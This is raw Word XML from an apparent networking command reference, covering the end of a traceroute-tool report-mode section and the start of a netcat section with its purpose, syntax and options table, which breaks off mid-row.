        <w:t>: Sends exactly 10 packets then exits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F056E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static output</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Single result instead of continuous updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9002D6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows when the test was started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC99638" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tree format</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: |-- shows network path hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694D150" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complete statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Same metrics as interactive mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EC447" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script-friendly</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Suitable for automation and logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2CA5F2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0.0% Loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Perfect connectivity on all hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE6F9B3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Low standard deviation indicates stable network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A061820" w14:textId="16558717" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>nc (netcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D86421" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> (netcat) command is a versatile networking utility for reading and writing data across network connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16864465" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00234914">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA9A94" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Create network connections, listen on ports, transfer files, and perform port scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408E8F9" w14:textId="5A8B3BD1" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00234914">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE5DB2"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options] hostname port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD22D8"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l [options] port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEA69D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3218"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7109B617" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717AAF52" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA4D846" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7307AB8F" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9B8732"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l, --listen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159E3FF1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Listen mode for incoming connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5B11B0B2" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084D70D5"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p, --source-port PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DEE53CD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Specify source port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="77F452D7" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50B4729B"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u, --udp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359D8B43" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use UDP instead of TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="335CCF5F" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731B0993"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v, --verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F4B35D3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="44133029" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A8C42C3"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vv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E9DEBF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Very verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="791EF58E" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F2B6884"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n, --nodns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F555EB4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't resolve DNS names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7486B7AF" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BF4472"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w, --wait SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB186A1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Connection timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="21AB3EC1" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F41B5AC"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i, --interval SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E3867D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Delay between lines/ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="72ECBFAE" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419347AE"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o, --output FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A31C8AF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Output hexdump to file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3396702D" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F827BCE"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x, --hex-dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD488F1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Hexdump incoming and outgoing traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="04D565FA" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5A3408"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r, --randomize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="788AEDE5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Randomize port order for port scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="541FBB9C" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09B5DDFF"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z, --zero-io</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21123FA1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Zero I/O mode (scanning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6FCD32FE" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="606D2B62"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t, --telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57263507" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Answer Telnet negotiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="58F0FFD0" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E2A383B"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e, --exec COMMAND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24BBEFF3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Execute command after connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="60F6B020" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3092B3CB"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c, --sh-exec COMMAND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07083570" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Execute command via /bin/sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="22873A37" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72CF9C6E"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B11BE1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="37A156AD" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D121A7"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A04DD0F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7CE7679D" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4386F69A"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s, --source ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAF3DED" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Specify source address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3D536988" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547EECEB"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T, --tos VALUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2453C904" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set Type of Service field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5EE0751E" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44046065"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C, --crlf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F2E24C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Send CRLF as line-ending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="74FC4308" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F9F54F"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k, --keep-open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0744C9BE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Keep listening after disconnect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7607828B" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA46EEA"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q, --quit SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B3FB4CB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Quit after specified seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="392661C3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1928148C"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b, --broadcast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31A8F0B0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Allow broadcast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="18B03ECB" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
